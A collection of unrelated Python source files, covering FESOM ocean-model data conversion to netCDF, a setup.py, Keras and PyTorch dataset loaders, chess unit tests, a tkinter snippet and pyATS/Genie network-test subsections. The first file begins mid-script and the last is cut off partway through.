vardir['vice']['rotate_with'] = 'uice'
def noempty_dict(d):
'''
Removes keys with empty string values from dictionary.
Parameters
----------
d : OrderedDict
input dictionary
Returns
-------
d_out : OrderedDict
output dict with empty strings removed
'''
d_out = OrderedDict()
for key, value in d.iteritems():
if value != u'':
d_out[key]=value
return d_out
def progressbar(progress_total, progress_passed, year, variable, \
timestep, level, time):
formated_time = num2date(time[timestep], time.units).strftime('%Y-%m-%d')
sys.stdout.write('{}\n'.format('Variable: '+variable+\
', Timestep: '+formated_time+\
', Level: '+str(level)))
tdif = progress_total
tpassed = progress_passed
ratio = tpassed/float(tdif)
filled = '=' * int( ratio * 50)
rest = '-' * ( 50 - int( ratio * 50) )
sys.stdout.write('|' + filled+'>'+rest+ '| {:.2f}%'.format(ratio*100))
sys.stdout.write('\r\033[1A')
sys.stdout.flush()
# Calculate distances and indeces that will be used for interpolation
distances, inds = pf.create_indexes_and_distances(mesh, lons, lats,\
k=k, n_jobs=8)
# The main loop
def convertit(year):
ifile = os.path.join(path_to_data, ifile_template.format(str(year)))
ofile = os.path.join(path_to_output, ofile_template.format(str(year)))
print('Open {}'.format(ifile))
fl = Dataset(ifile)
fw = Dataset(ofile, mode='w',data_model='NETCDF4_CLASSIC', )
var2d = 0
var3d = 0
for varname in out_vars:
if vardir[varname]['dims'] == '2D':
var2d += 1
elif vardir[varname]['dims'] == '3D':
var3d += 1
var3d = var3d*len(levels)*fl.variables['time'].shape[0]
var2d = var2d*fl.variables['time'].shape[0]
progress_total = var3d+var2d
progress_passed = 0
# create dimensions
fw.createDimension('latitude', lons.shape[0])
fw.createDimension('longitude', lats.shape[1])
fw.createDimension('time', None)
fw.createDimension('depth_coord', levels.shape[0] )
lat = fw.createVariable('latitude', 'd', ('latitude'))
lat.setncatts(noempty_dict(cmore_table['axis_entry']['latitude']))
lat[:] = lats[:,0].flatten()
lon = fw.createVariable('longitude', 'd', ('longitude'))
lon.setncatts(noempty_dict(cmore_table['axis_entry']['longitude']))
lon[:] = lons[0,:].flatten()
depth = fw.createVariable('depth_coord','d',('depth_coord'))
depth.setncatts(noempty_dict(cmore_table['axis_entry']['depth_coord']))
depth[:] = levels
time = fw.createVariable('time','d',('time'))
time.setncatts(cmore_table['axis_entry']['time'])
if distribute_timesteps:
nsteps = fl.variables['time'].shape[0]
td = datetime.timedelta(days = 365/nsteps)
sdate = datetime.datetime(year,1,1,0,0,0)
seconds = []
for i in range(1,nsteps+1):
workdate = sdate + td*i
seconds.append( (workdate-sdate).total_seconds() )
time.units = 'seconds since {}-01-01 00:00:00'.format(str(year))
time[:] = seconds
elif fl.variables['time'].units.strip().startswith('seconds since'):
time.units = fl.variables['time'].units
time[:] = fl.variables['time'][:]
elif fl.variables['time'].shape[0] == 12:
sdate = datetime.datetime(year,1,1,0,0,0)
td = datetime.timedelta(days = 14.5)
seconds = []
for i in range(1,13):
workdate = datetime.datetime(year,i,1,0,0,0)+td
seconds.append( (workdate-sdate).total_seconds() )
time.units = 'seconds since {}-01-01 00:00:00'.format(str(year))
time[:] = seconds
else:
time.units = 'seconds since {}-01-01 00:00:00'.format(str(year))
time[:] = fl.variables['time'][:]
# Store processed variables (to not repeat
# processing for vector variables)
completed = []
# variables loop
for varname in out_vars:
# check if we have to convert two variables at once
# for vector variables.
do_two_vars = (vardir[varname].has_key('rotate_with') is True)
#print("Converting {}.".format(varname))
# skip if the variable was already converted
if varname in completed:
pass
# 3D variables processing
elif vardir[varname]['dims']=='3D':
# Create netCDF variable
temp = fw.createVariable(vardir[varname]['cname'],'d',\
('time','depth_coord','latitude','longitude'), \
fill_value=-99999, zlib=zlib, complevel=1)
# add CMOR complient attributes
temp.setncatts(noempty_dict(cmore_table['variable_entry'][vardir[varname]['cname']]))
# If we have two convert two variables at once, create netCDF variable for
# the second variable
if do_two_vars is True:
varname2 = vardir[varname]['rotate_with']
temp2 = fw.createVariable(vardir[varname2]['cname'],'d',('time','depth_coord','latitude','longitude'), fill_value=-99999, zlib=zlib, complevel=1)
temp2.setncatts(noempty_dict(cmore_table['variable_entry'][vardir[varname2]['cname']]))
# Loop over timesteps for 3D variables
for i in range(fl.variables[varname].shape[0]):
#for i in range(2):
# Get the whole 3D field in to memory. It turns out that this is more
# effective than to select individual levels from the file located on the disk.
all_layers = fl.variables[varname][i,:]
# Get the data for the second variable if needed
if do_two_vars is True:
#print("Also converting {}, triggered by {}.".format(varname2, varname))
all_layers2 = fl.variables[varname2][i,:]
# Loop over vertical levels
for dlev, llev in enumerate(levels):
# get indeces of the gridpoints that corespond to the level
ind_depth, ind_noempty, ind_empty = pf.ind_for_depth(llev, mesh)
# get the data for the level
level_data=np.zeros(shape=(mesh.n2d))
level_data[ind_noempty]=all_layers[ind_depth[ind_noempty]]
level_data[ind_empty] = np.nan
# Spetial treatment of the vector variables that need rotation
if do_two_vars is True:
# get the data for the level of the second variable
level_data2=np.zeros(shape=(mesh.n2d))
level_data2[ind_noempty]=all_layers2[ind_depth[ind_noempty]]
level_data2[ind_empty] = np.nan
#print('Rotate {} and {}'.format(varname, varname2))
# Rotate vector variables to geographical grid
uunr,vunr = pf.vec_rotate_r2g(angles_for_rotation[0],angles_for_rotation[1], \
angles_for_rotation[2], mesh.x2, mesh.y2,\
level_data, level_data2, 1)
# Interpolate rotated variables
#print('interpolation, layer {}'.format(str(llev)))
air_nearest = pf.fesom2regular(uunr, mesh, lons, lats, distances=distances,\
inds=inds, radius_of_influence=radius_of_influence, n_jobs=1)
air_nearest2 = pf.fesom2regular(vunr, mesh, lons, lats, distances=distances,\
inds=inds, radius_of_influence=radius_of_influence, n_jobs=1)
# Put values to the netCDF variables
temp[i,dlev,:,:] = air_nearest[:,:].filled(-99999)
temp2[i,dlev,:,:] = air_nearest2[:,:].filled(-99999)
else:
# Interpolate scalar variable
#print('interpolation, layer {}'.format(str(llev)))
air_nearest = pf.fesom2regular(level_data, mesh, lons, lats, distances=distances,\
inds=inds, radius_of_influence=radius_of_influence, n_jobs=1)
# Put values to the netCDF variable
temp[i,dlev,:,:] = air_nearest[:,:].filled(-99999)
progress_passed += 1
if do_two_vars is True:
progress_passed += 1
progressbar(progress_total, progress_passed, year,\
varname, i, llev, time)
# END Loop over timesteps for 3D variables
# add variable to the list of processed variables
completed.append(varname)
if do_two_vars is True:
completed.append(varname2)
# End 3D variables processing
# 2D variables processing
elif vardir[varname]['dims']=='2D':
# Create netCDF variable
temp = fw.createVariable(vardir[varname]['cname'],'d',\
('time','latitude','longitude'), \
fill_value=-99999, zlib=zlib, complevel=1)
# add CMOR complient attributes
temp.setncatts(noempty_dict(cmore_table['variable_entry'][vardir[varname]['cname']]))
# If we have two convert two variables at once, create netCDF variable for
# the second variable
if do_two_vars is True:
varname2 = vardir[varname]['rotate_with']
temp2 = fw.createVariable(vardir[varname2]['cname'],'d',\
('time','latitude','longitude'), \
fill_value=-99999, zlib=zlib, complevel=1)
temp2.setncatts(noempty_dict(cmore_table['variable_entry'][vardir[varname2]['cname']]))
# For sea ice variables we have to open different file, so
# open ether ocean or sea ice input file.
if vardir[varname]['realm']=='ocean':
temp.setncatts(noempty_dict(cmore_table['variable_entry'][vardir[varname]['cname']]))
ncfile_handler = fl
elif vardir[varname]['realm']=='seaice':
temp.setncatts(noempty_dict(cmore_table['variable_entry'][vardir[varname]['cname']]))
ifile_ice = os.path.join(path_to_data, ifile_template_ice.format(str(year)))
ncfile_handler = Dataset(ifile_ice)
# Loop over timesteps for 2D variables
for i in range(ncfile_handler.variables[varname].shape[0]):
#for i in range(2):
# Get the whole 3D field in to memory. It turns out that this is more
# effective than to select individual levels from the file located on the disk.
all_layers = ncfile_handler.variables[varname][i,:]
# Get the data for the second variable if needed
if do_two_vars is True:
print("Also converting {}, triggered by {}.".format(varname2, varname))
all_layers2 = ncfile_handler.variables[varname2][i,:]
# get indeces of the gridpoints that corespond to the surface level
ind_depth, ind_noempty, ind_empty = pf.ind_for_depth(0, mesh)
# get the data for the surface level
level_data=np.zeros(shape=(mesh.n2d))
level_data[ind_noempty]=all_layers[ind_depth[ind_noempty]]
level_data[ind_empty] = np.nan
# Spetial treatment of the vector variables that need rotation
if do_two_vars is True:
# get the data for the surface level of the second variable
level_data2=np.zeros(shape=(mesh.n2d))
level_data2[ind_noempty]=all_layers2[ind_depth[ind_noempty]]
level_data2[ind_empty] = np.nan
# Rotate vector variables to geographical grid
print('Rotate {} and {}'.format(varname, varname2))
uunr,vunr = pf.vec_rotate_r2g(angles_for_rotation[0],angles_for_rotation[1], \
angles_for_rotation[2], mesh.x2, mesh.y2,\
level_data, level_data2, 1)
# Interpolate rotated variables )
air_nearest = pf.fesom2regular(uunr, mesh, lons, lats, distances=distances,\
inds=inds, radius_of_influence=radius_of_influence, n_jobs=1)
air_nearest2 = pf.fesom2regular(vunr, mesh, lons, lats, distances=distances,\
inds=inds, radius_of_influence=radius_of_influence, n_jobs=1)
# fill in netCDF variables
temp[i,:,:] = air_nearest[:,:].filled(-99999)
temp2[i,:,:] = air_nearest2[:,:].filled(-99999)
else:
# Interpolate scalar variable and fill in netCDF variable.
air_nearest = pf.fesom2regular(level_data, mesh, lons, lats, distances=distances,\
inds=inds, radius_of_influence=radius_of_influence, n_jobs=1)
temp[i,:,:] = air_nearest[:,:].filled(-99999)
progress_passed += 1
if do_two_vars is True:
progress_passed += 1
progressbar(progress_total, progress_passed, year,\
varname, i, 0, time)
# END Loop over timesteps for 2D variables
completed.append(varname)
if do_two_vars is True:
completed.append(varname2)
# end variables loop
fw.close()
print('The {} is ready'.format(ofile))
# end of the main loop
print('='*50)
yearss = range(start_year, end_year+1)
pool = mp.Pool(processes=1)
r = pool.map(convertit, yearss)
pool.close()
#for year in range(start_year, end_year+1):
# convertit(year)
# Open input and output netCDF files
|
import tkinter as tk
import tkinter.ttk as ttk
root = tk.Tk()
s = ttk.Style()
#s.configure('TButton', background='green')
bg = s.lookup('TButton', 'background')
s.map('TButton',
# background=[('active', 'red')]
background=[('active', bg)]
)
btn1 = ttk.Button(root, text='Sample', style='TButton')
btn1.pack()
btn2 = ttk.Button(root, text='Sample')
btn2.pack()
root.mainloop()
|
from setuptools import setup
from os import path
this_directory = path.abspath(path.dirname(__file__))
with open(path.join(this_directory, 'README.md'), encoding = 'utf-8') as f:
long_description = f.read()
setup(
name = 'ror',
packages = ['ror'],
version = '0.0.1',
python_requires = '>=3.6',
license = 'MIT',
description = 'ROR method solver',
long_description = long_description,
long_description_content_type = 'text/markdown',
author = 'Jakub Tomczak',
url = 'https://github.com/jtomczak/ror',
install_requires = [
'gurobipy',
'pandas',
'numpy',
'graphviz',
'pylatex'
],
dependency_links = ['https://pypi.gurobi.com'],
classifiers = [
'Development Status :: 3 - Alpha',
'Programming Language :: Python :: 3',
'Intended Audience :: Developers',
'Topic :: Software Development :: Science/Research',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent'
],
)
|
import os
import cv2
import random
import pickle
import numpy as np
from helper import constant
from imutils import paths
from matplotlib import pyplot as plt
from sklearn.preprocessing import LabelBinarizer
from sklearn.model_selection import train_test_split
from keras.preprocessing.image import ImageDataGenerator, img_to_array
class DataHandler:
def load_dataset(self, args):
"""
:param args: list of arguments (list)
:return x_train, x_test, y_train, y_test: train/test sets (numpy arrays)
"""
print("[INFO] loading images...")
data, labels = self.load_data_and_labels(args)
print("[INFO] data matrix: {:.2f}MB".format(data.nbytes / (1024 * 1000.0)))
lb = LabelBinarizer()
labels = lb.fit_transform(labels)
print("[INFO] serializing label binarizer...")
self.dump_labels(args, lb)
print("[INFO] splitting train/test sets...")
(x_train, x_test, y_train, y_test) = train_test_split(data, labels, test_size=0.2, random_state=42)
self.show_examples(args, x_train)
return x_train, x_test, y_train, y_test
def load_data_and_labels(self, args):
"""
:param args: list of arguments (list)
:return data, labels: loaded data and labels (numpy arrays)
"""
data = []
labels = []
image_paths = sorted(list(paths.list_images(args["dataset"])))
random.seed(42)
random.shuffle(image_paths)
for imagePath in image_paths:
# load the image, pre-process it, and store it in the data list
image = cv2.imread(imagePath)
image = cv2.resize(image, (constant.IMAGE_HEIGHT, constant.IMAGE_WIDTH))
image = img_to_array(image)
data.append(image)
# extract the class label from the image path and update the
# labels list
label = imagePath.split(os.path.sep)[-2]
labels.append(label)
data = np.array(data, dtype="float") / 255.0
labels = np.array(labels)
return data, labels
def load_labels(self, args):
"""
:param args: list of arguments (list)
:return lb: label binarizer
"""
lb = pickle.loads(open(args["labelbin"], "rb").read())
return lb
def dump_labels(self, args, lb):
"""
:param args: list of arguments (list)
:param lb: label binarizer
:return:
"""
f = open(args["labelbin"], "wb")
f.write(pickle.dumps(lb))
f.close()
def load_example(self, image_path):
"""
:param image_path: path of the image (str)
:return example, image: example to classify, image copy to display
"""
example = cv2.imread(image_path)
image = example.copy()
# pre-process the image for classification
example = cv2.resize(example, (constant.IMAGE_HEIGHT, constant.IMAGE_WIDTH))
example = example.astype("float") / 255.0
example = img_to_array(example)
example = np.expand_dims(example, axis=0)
return example, image
def data_augmentation(self):
"""
:return: ImageDataGenerator class
"""
return ImageDataGenerator(
rotation_range=25,
width_shift_range=0.1,
height_shift_range=0.1,
shear_range=0.2,
zoom_range=0.2,
horizontal_flip=True,
fill_mode="nearest"
)
def show_examples(self, args, x_train):
"""
:param args: list of arguments (list)
:param x_train: training set (numpy array)
:return:
"""
if args["show_examples"]:
print("[INFO] showing a batch of training examples...")
for i in range(9):
plt.subplot(330 + 1 + i)
plt.imshow(x_train[i])
plt.show()
def display_dataset_shape(self, args):
"""
:param args: list of arguments (list)
:return:
"""
x_train, x_test, y_train, y_test = self.load_dataset(args)
print("[INFO] number of training examples = " + str(x_train.shape[0]))
print("[INFO] number of test examples = " + str(x_test.shape[0]))
print("[INFO] X_train shape: " + str(x_train.shape))
print("[INFO] Y_train shape: " + str(y_train.shape))
print("[INFO] X_test shape: " + str(x_test.shape))
print("[INFO] Y_test shape: " + str(y_test.shape))
|
import unittest
from pieces.bishop import Bishop
from board import Board
class TestSum(unittest.TestCase):
def test_no_movement(self):
board = Board()
bishop1 = Bishop("W", 7, 0, board)
bishop2 = Bishop("W", 6, 1, board)
board.add_piece(bishop1, 7, 0)
board.add_piece(bishop2, 6, 1)
self.assertEqual(bishop1.generate_legal_moves(), [], "Should be empty array")
def test_capture(self):
board = Board()
bishop1 = Bishop("W", 7, 0, board)
bishop2 = Bishop("B", 6, 1, board)
board.add_piece(bishop1, 7, 0)
board.add_piece(bishop2, 6, 1)
self.assertEqual(bishop1.generate_legal_moves(), [(6, 1)], "Should be [(6, 1)]")
def test_capture_and_move(self):
board = Board()
bishop1 = Bishop("W", 6, 1, board)
bishop2 = Bishop("B", 7, 0, board)
bishop3 = Bishop("W", 5, 2, board)
bishop4 = Bishop("W", 5, 0, board)
bishop5 = Bishop("W", 7, 2, board)
board.add_piece(bishop1, 6, 1)
board.add_piece(bishop2, 7, 0)
board.add_piece(bishop3, 5, 2)
board.add_piece(bishop4, 5, 0)
board.add_piece(bishop5, 7, 2)
self.assertEqual(bishop1.generate_legal_moves(), [(7, 0)], "Should be [(7, 0)]")
def test_full_diagonal(self):
board = Board()
bishop1 = Bishop("W", 7, 7, board)
board.add_piece(bishop1, 7, 7)
self.assertEqual(bishop1.generate_legal_moves(),
[(6, 6), (5, 5), (4, 4), (3, 3), (2, 2), (1, 1,), (0, 0)],
"Should be [(6, 6), (5, 5), (4, 4), (3, 3), (2, 2), (1, 1,), (0, 0)]")
if __name__ == '__main__':
unittest.main()
|
"""Returns a timeseries with input and target.
"""
import torch
import torch.utils.data as data
import numpy as np
class Timeseries(data.Dataset):
"""Provide a dataset with samples x timesteps x (remaining variables).
"""
def __init__(self, data, timesteps=[0], device=None):
self.data = data
self.timesteps = timesteps
time_range = max(max(timesteps), 0) - min(min(timesteps), 0)
self.min_time = min(min(timesteps), 0)
self.items_per_sample = self.data.shape[1]-(time_range+1)
self.device = device
def __len__(self):
return self.data.shape[0]*self.items_per_sample
def to(self, device=None):
self.device = device
return self
def __getitem__(self, idx):
idx_0 = int(np.floor(idx/self.items_per_sample))
idx_1 = int(idx % self.items_per_sample)
input = self.data[idx_0, [idx_1-self.min_time]]
target_range = [idx_1+t-self.min_time for t in self.timesteps]
target = self.data[idx_0, target_range]
input = torch.from_numpy(input.astype(np.float32))\
#.to(device=self.device)
target = torch.from_numpy(target.astype(np.float32))\
#.to(device=self.device)
return {'input': input, 'target': target}
|
# python
import logging
from copy import deepcopy
from operator import attrgetter
from json import dumps
# Genie Libs
from genie.libs import sdk
# ats
from pyats import aetest
from pyats.log.utils import banner
from pyats.datastructures import AttrDict
# abstract
from genie.abstract import Lookup
# import pcall
import importlib
try:
pcall = importlib.import_module('pyats.async').pcall
except ImportError:
from pyats.async_ import pcall
# # import pcall
# from pyats.async import pcall
# unicon
from unicon.eal.dialogs import Statement, Dialog
# Genie
from genie.utils.timeout import Timeout
from genie.utils.summary import Summary
from genie.conf.base import Base as ConfBase
from genie.ops.base import Base as OpsBase
# genie.libs
from genie.libs import ops
from genie.libs import conf
from genie.libs.sdk.libs.abstracted_libs.processors import load_config_precessor
from genie.libs.sdk.libs.utils.normalize import _to_dict
from genie.libs.sdk.libs.utils.normalize import merge_dict
log = logging.getLogger(__name__)
EXCLUDED_DEVICE_TYPES = ['tgn']
@aetest.subsection
def save_bootvar(self, testbed):
"""Check boot information and save bootvar to startup-config
Args:
testbed (`obj`): Testbed object
Returns:
None
Raises:
pyATS Results
"""
# Create Summary
summary = Summary(title='Summary', width=90)
devices = []
for dev in self.parent.mapping_data['devices']:
device = testbed.devices[dev]
if device.type in EXCLUDED_DEVICE_TYPES:
msg = " - This subsection is not supported for 'TGN' devices"
summarize(summary, message=msg, device=dev)
continue
devices.append(device)
device_dict = {}
failed = False
# We don't catch exceptions since failures will lead to passx in that
# CommonSetup subsection
asynchronous_boot_var_output = pcall(
asynchronous_save_boot_variable,
ckwargs={
'self': self,
'device_dict': device_dict},
device=tuple(devices))
for item in asynchronous_boot_var_output:
for dev, res in item.items():
if res == 'Failed':
failed = True
msg = " - Failed to save boot variable or copy "\
"running-config to startup-config"
summarize(summary, message=msg, device=dev)
elif res == 'Skipped':
msg = " - Skipped saving boot variable or copy "\
"running-config to startup-config"
summarize(summary, message=msg, device=dev)
else:
msg = " - Successfully saved boot variable"
summarize(summary, message=msg, device=dev)
summary.print()
if failed:
self.passx("Issue while saving boot variable on one of the devices, "
"Check section summary for more details")
@aetest.subsection
def learn_the_system(self, testbed, steps, features=None):
"""Learn and store the system properties
Args:
testbed (`obj`): Testbed object
steps (`obj`): aetest steps object
features (`dict`): dict of components and the feature that contains the component.
ex. {'pim': ['autorp',],
'bgp': ['confederationpeers', 'gracefulrestart']}
Returns:
None
Raises:
pyATS Results
"""
log.info(
banner(
'Learn and store platform information, lldp neighbors'
', from PTS if PTS is existed, otherwise from show commands'))
# get uut, having a uut is mandatory in Genie
uut = testbed.devices['uut']
lookup = Lookup.from_device(uut)
# get platform PTS
platform_pts = self.parameters.get(
'pts',
{}).get(
'platform',
{}).get(
'uut',
None)
with steps.start("Store and learn platform information from 'show lldp neighbors detail' on {}"
.format(self.name)) as step:
try:
lookup.sdk.libs.abstracted_libs .subsection.learn_system(
device=uut, steps=steps, platform_pts=platform_pts)
except Exception as e:
step.passx('Cannot Learn and Store system info',
from_exception=e)
# learn platform lldp neighbors
with steps.start("learn platform lldp neighbors on device {}"
.format(uut.name)) as step:
# inital lldp ops object
lldp_ops = lookup.ops.lldp.lldp.Lldp(
uut, attributes=['info[interfaces][(.*)][neighbors][(.*)][port_id]'])
# learn the lldp ops
try:
lldp_ops.learn()
except Exception as e:
step.passx('Cannot learn lldp information',
from_exception=e)
if not hasattr(lldp_ops, 'info'):
step.passx('No LLDP neighbors')
# store the lldp information
uut.lldp_mapping = lldp_ops.info['interfaces']
@aetest.subsection
def learn_the_system_from_conf_ops(self, testbed, steps, features=None):
"""Learn and store the system properties
Args:
testbed (`obj`): Testbed object
steps (`obj`): aetest steps object
features (`dict`): dict of feature and attributes which want to learn.
ex. {'conf.pim.Pim': [
'pim[vrf_attr][(.*)][address_family_attr][ipv4][send_rp_announce_intf]',
'pim[vrf_attr][(.*)][address_family_attr][ipv4][send_rp_announce_group_list]'],
'conf.bgp.Bgp': ['bgp[instance][(.*)][vrf_attr][(.*)][confederation_peers_as]']}
Returns:
None
Raises:
pyATS Results
"""
def remove_parent_from_conf_dict(conf_dict):
temp_dict = deepcopy(conf_dict)
for key, val in temp_dict.items():
if key == 'parent':
conf_dict.pop('parent')
if isinstance(val, dict):
remove_parent_from_conf_dict(conf_dict[key])
def store_structure(device, feature):
# get feature and attributes
[(ft, attr)] = feature.items()
log.info(banner("Learning '{n}' feature with "
"attribues {a} on device {d}"
.format(n=ft, a=attr, d=device)))
# perform lookup per device
lib = Lookup.from_device(device)
# attach ops and conf
lib.conf = getattr(lib, 'conf', conf)
lib.ops = getattr(lib, 'ops', ops)
# create the ops/conf instance
try:
obj = attrgetter(ft)(lib)
except Exception:
raise AttributeError('Cannot load %s for '
'device %s.' % (ft, device.name))
# conf learn_config
if issubclass(obj, ConfBase):
ret = obj.learn_config(device=device, attributes=attr)
ret = _to_dict(ret[0])
# delete the non-used objects for pcall to retrun
ret.pop('__testbed__')
ret.pop('devices')
ret.pop('interfaces')
remove_parent_from_conf_dict(ret['device_attr'][device.name])
elif issubclass(obj, OpsBase):
ret = obj(device, attributes=attr)
ret.learn()
temp = AttrDict()
temp.info = getattr(ret, 'info', {})
ret = temp
ret_dict = {}
ret_dict.setdefault('lts', {}).\
setdefault(ft, {}).setdefault(device.name, ret)
# return the dictionary
return ret_dict
devices = []
for name in testbed.devices:
dev = testbed.devices[name]
if not dev.is_connected():
continue
devices.append(dev)
# create the abstract object list
merged_dict = {}
for ft in features:
worker_devs = []
worker_features = []
for device in devices:
worker_devs.append(device)
worker_features.append({ft: features[ft]})
# pcall for each feature
ret = pcall(
store_structure,
device=worker_devs,
feature=worker_features)
[merge_dict(merged_dict, i) for i in ret]
self.parent.parameters.update(merged_dict)
# print out what we learned in LTS
log.info('LTS information is \n{d}'.format(d=dumps(merged_dict, indent=5)))
@aetest.subsection
def load_config_as_string(self, testbed, steps, configs, connect=False):
if connect:
for name in self.parent.mapping_data['devices']:
dev = testbed.devices[name]
# connect with console
try:
dev.connect(via='a')
except Exception as e:
self.failed(
'Cannot connect the console on {}'.format(
dev.name), from_exception=e)
try:
load_config_precessor(self, configs)
except Exception as e:
self.passx('Cannot Load configuration',
from_exception=e)
# disconnect the router from console
if connect:
for name in self.parent.mapping_data['devices']:
dev = testbed.devices[name]
# connect with console
try:
dev.disconnect()
dev.destroy()
except Exception as e:
self.passx(
'Cannot disconnect the console on {}'.format(
dev.name), from_exception=e)
@aetest.subsection
def configure_replace(self, testbed, steps, devices, include_os=None,
exclude_os=None, include_devices=None, exclude_devices=None,
timeout=60):
if exclude_devices:
log.info("Excluded devices by exclude_devices: {exclude_devices}".format(
exclude_devices=exclude_devices))
if include_devices:
log.info("Included devices by include_devices: {include_devices}".format(
include_devices=include_devices))
if include_os:
log.info("Included OS by include_os: {include_os}"
.format(include_os=include_os))
if exclude_os:
log.info("Excluded OS by exclude_os: {exclude_os}"
.format(exclude_os=exclude_os))
#Utility function
def _configure_replace_util(device, dev, device_name):
try:
file_name = None
file_location = None
lookup = Lookup.from_device(device)
if 'file_location' in dev:
file_location = dev['file_location']
else:
file_location = lookup.sdk.libs. \
abstracted_libs.subsection.get_default_dir(
device=device)
if 'file_name' not in dev:
log.error('Missing file_name for device {}'.format(device_name))
return
if 'file_name' in dev:
file_name = dev['file_name']
lookup.sdk.libs.abstracted_libs.subsection.configure_replace(
device, file_location, timeout=dev.get(
'timeout', timeout), file_name=file_name)
except Exception as e:
self.failed("Failed to replace config : {}".format(str(e)))
log.info("Configure replace is done for device {}".format(device_name))
if not None in [exclude_devices, include_devices]:
if set(exclude_devices).intersection(include_devices):
raise ValueError("Same device is specified in both include and exclude devices filter. "
"Use only one filter. Both are not allowed")
if not None in [exclude_os, include_os]:
if set(exclude_os).intersection(include_os):
raise ValueError("Same os is specified in both include and exclude os filter. "
"Use only one filter. Both are not allowed")
for name, dev in devices.items():
if name == 'all':
for device_name in list(testbed.devices.keys()):
if exclude_devices and device_name in exclude_devices:
continue
if include_devices and device_name not in include_devices:
continue
# Find device from testbed yaml file based on device name
device = testbed.devices[device_name]
if include_os and device.os not in include_os:
continue
if exclude_os and device.os in exclude_os:
continue
if not device.is_connected():
log.warning("Skipping '{dev}' as it is not connected"
.format(dev=device_name))
continue
log.info("Executing 'configure_replace' subsection on '{dev}'"
.format(dev=device_name))
_configure_replace_util(device=device, dev=dev, device_name=device_name)
else:
log.info("Executing 'configure_replace' subsection on '{dev}'"
.format(dev=name))
if name not in testbed.devices:
log.warning("Skipping '{dev}' as it does not exist in the testbed"
.format(dev=name))
continue
device = testbed.devices[name]
if not device.is_connected():
log.warning("Skipping '{dev}' as it is not connected"
.format(dev=name))
continue
_configure_replace_util(device=device, dev=dev, device_name=name)
@aetest.subsection
def learn_system_defaults(self, testbed):
"""Execute commands to learn default system information
Args:
testbed (`obj`): Testbed object
Returns:
None
Raises:
pyATS Results
"""
# Get default memory location
self.parent.default_file_system = {}
# Create Summary
summary = Summary(title='Summary', width=150)
for device in self.parent.mapping_data['devices']:
dev = testbed.devices[device]
lookup = Lookup.from_device(dev)
# Skip in case of TGN device
if dev.type in EXCLUDED_DEVICE_TYPES:
log.info("This subsection is not supported for "
"TGN device '{}'".format(dev.name))
msg = " - This subsection is not supported for 'TGN' devices"
summarize(summary, message=msg, device=dev.name)
continue
try:
self.parent.default_file_system[dev.name] = lookup.sdk.libs.\
abstracted_libs.subsection.get_default_dir(
device=dev)
msg = " - Successfully learnt system default directory"
summarize(summary, message=msg, device=device)
except LookupError as e:
log.info('Cannot find device {d} correspoding get_default_dir'.
format(d=dev.name))
msg = " - Didn't find device OS corresponding "\
"'get_default_dir' implementation, Please contact Genie support"
summarize(summary, message=msg, device=device)
except Exception as e:
msg = " - Failed to learn system default directory"
summarize(summary, message=msg, device=device)
summary.print()
self.failed('Unable to learn system default directory',
from_exception=e)
summary.print()
if not self.parent.default_file_system:
# Create Summary
summary = Summary(title='Summary', width=90)
summary.add_message(
"* Summary for device(s): "
"{}".format(
', '.join(
self.parent.mapping_data['devices'])))
summary.add_sep_line()
msg = " - Couldn't set system default directory"
summarize(summary, message=msg)
summary.print()
self.failed('Unable to set system default directory')
# TODO: Learn and save more system defaults in this section
def summarize(summary, message, device=None):
'''A function for building the summary table messages'''
if device:
summary.add_message('* Summary for device: {}'.
format(device))
summary.add_sep_line()
summary.add_message(message)
summary.add_subtitle_line()
def asynchronous_save_boot_variable(self, device, device_dict):
'''Use asynchronous execution when saving boot variables on devices'''
log.info(banner("Check boot information to see if they are consistent\n"
"and save bootvar to startup-config on device '{d}'".
format(d=device.name)))
# get platform pts
platform_pts = self.parameters.get('pts', {}).get('platform', {}).get(
device.name, None)
try:
result = Lookup.from_device(device).sdk.libs.abstracted_libs.subsection.\
save_device_information(device=device, platform_pts=platform_pts)
except Exception as e:
device_dict[device.name] = 'Failed'
else:
if result == 'Skipped':
device_dict[device.name] = 'Skipped'
else:
device_dict[device.name] = 'Passed'
return device_dict
|
import os
import numpy as np
import h5py
import pickle
from tqdm import tqdm
import torch
from torch.utils.data import Dataset
from torch.utils.data import DataLoader
from utils import generate_candidates, calculate_IoU_batch
class RawData(Dataset):
def __init__(self, feature_path, data_path):
self.feature_path = feature_path
with open(data_path, 'rb') as f:
self.data = pickle.load(f)
features = h5py.File(self.feature_path, 'r')
video_names = [x for x in self.data.keys() if x in self.data and x in features]
# [(video1, sentence_num1), (video2, sentence_num1)...]
self.data_idx = []
for video in video_names:
sentence_num = len(self.data[video]['sentences'])
for i in range(sentence_num):
self.data_idx.append((video, i))
def __getitem__(self, index):
video_name, sentence_idx = self.data_idx[index]
item = self.data[video_name]
duration = item['duration']
timestamps = item['timestamps'][sentence_idx]
sentences = item['sentences'][sentence_idx]
tokens = item['tokens'][sentence_idx]
embeddings = item['embeddings'][sentence_idx]
word_mat = item['adj_mats'][sentence_idx]
vfeats = h5py.File(self.feature_path, 'r')[video_name][:]
frame_num = vfeats.shape[0]
start_frame = int(1.0 * frame_num * timestamps[0] / duration)
end_frame = int(1.0 * frame_num * timestamps[1] / duration)
if end_frame >= frame_num:
end_frame = frame_num - 1
if start_frame > end_frame:
start_frame = end_frame
assert start_frame <= end_frame
assert 0 <= start_frame < frame_num
assert 0 <= end_frame < frame_num
label = np.asarray([start_frame, end_frame]).astype(np.int32)
srl = item['srl'][sentence_idx]
return vfeats, embeddings, word_mat, label, duration, timestamps, srl
def __len__(self):
return len(self.data_idx)
class VideoSentencePair(RawData):
def __init__(self, feature_path, data_path, max_frames_num, max_words_num, window_widths, max_srl_num):
super().__init__(feature_path, data_path)
self.max_frames_num = max_frames_num
self.max_words_num = max_words_num
self.candidates, _ = generate_candidates(max_frames_num, window_widths) #generate candidates of windows
self.max_srl_num = max_srl_num
def __getitem__(self, index):
vfeats, word_vecs, word_mat, label, duration, timestamps, srl = super().__getitem__(index)
vfeats, frame_mask, frame_mat, label = self.__video_sampling(vfeats, label)
word_vecs, word_mask, word_mat, objects, actions, srl_num = self.__word_padding(word_vecs, word_mat, srl)
scores = self.__cal_candidate_scores(label, frame_mask, duration) #IOU of each window
return vfeats, frame_mask, frame_mat, word_vecs, word_mask, word_mat, label, scores, duration, timestamps, objects, actions, srl_num
def __video_sampling(self, vfeats, label):
# sample frame to a fixed num and recompute the label
ori_video_len = vfeats.shape[0]
frame_mask = np.ones([self.max_frames_num], np.uint8)
